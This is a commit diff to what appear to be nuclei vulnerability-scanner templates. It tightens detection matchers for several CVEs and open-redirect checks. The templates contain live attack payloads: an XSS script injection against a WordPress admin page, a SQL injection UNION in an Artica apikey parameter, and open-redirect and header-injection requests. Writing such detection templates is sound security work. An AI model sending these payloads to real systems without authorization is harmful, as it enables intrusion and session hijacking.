Strict matchers / f/p fix (#4320)

* more strict matcher + matcher fix

* misc updates

cves/2018/CVE-2018-18069.yaml

@@ -20,12 +20,18 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/wp-admin/admin.php"
-    body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
-    redirects: true
 
+    body: |
+      icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>
+
+    redirects: true
+    max-redirects: 2
     matchers:
       - type: dsl
         dsl:
-          - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
+          - 'contains(tolower(all_headers), "text/html")'
+          - 'contains(set_cookie, "_icl_current_admin_language")'
+          - 'contains(body, "\"><script>alert(0);</script>")'
+        condition: and
 
 # Enhanced by mp on 2022/04/08

cves/2019/CVE-2019-14223.yaml

@@ -14,17 +14,21 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2019-14223
     cwe-id: CWE-601
-  tags: cve,cve2019,redirect
+  tags: cve,cve2019,redirect,alfresco
 
 requests:
   - method: POST
     path:
       - '{{BaseURL}}/share/page/dologin'
+
     headers:
       Content-Type: application/x-www-form-urlencoded
-    body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
+
+    body: |
+      success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
+
     matchers:
       - type: regex
-        part: body
+        part: header
         regex:
-          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"
+          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"

cves/2020/CVE-2020-15129.yaml

@@ -19,15 +19,17 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}"
+
     headers:
       X-Forwarded-Prefix: "https://foo.nl"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 302
+
       - type: word
+        part: body
         words:
           - "<a href=\"https://foo.nl/dashboard/\">Found</a>"
-        condition: or
-        part: body

cves/2020/CVE-2020-17506.yaml

@@ -19,6 +19,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
+
     redirects: true
     max-redirects: 1
     matchers-condition: and
@@ -26,17 +27,19 @@ requests:
       - type: word
         words:
           - "artica-applianc"
+
       - type: status
         status:
           - 200
           - 301
           - 302
         condition: or
+
       - type: word
-        name: session
+        part: header
         words:
           - "PHPSESSID"
-        part: header
+
     extractors:
       - type: kval
         kval:

cves/2020/CVE-2020-24550.yaml

@@ -16,16 +16,16 @@ info:
 
 requests:
   - method: GET
-
     path:
       - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
 
     matchers-condition: and
     matchers:
       - type: word
+        part: header
         words:
           - "Location: https://example.com"
-        part: header
+
       - type: status
         status:
           - 301

vulnerabilities/other/aspnuke-openredirect.yaml

@@ -9,9 +9,10 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569"
+      - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
+
     matchers:
       - type: regex
-        part: body
+        part: header
         regex:
-          - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$'
+          - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'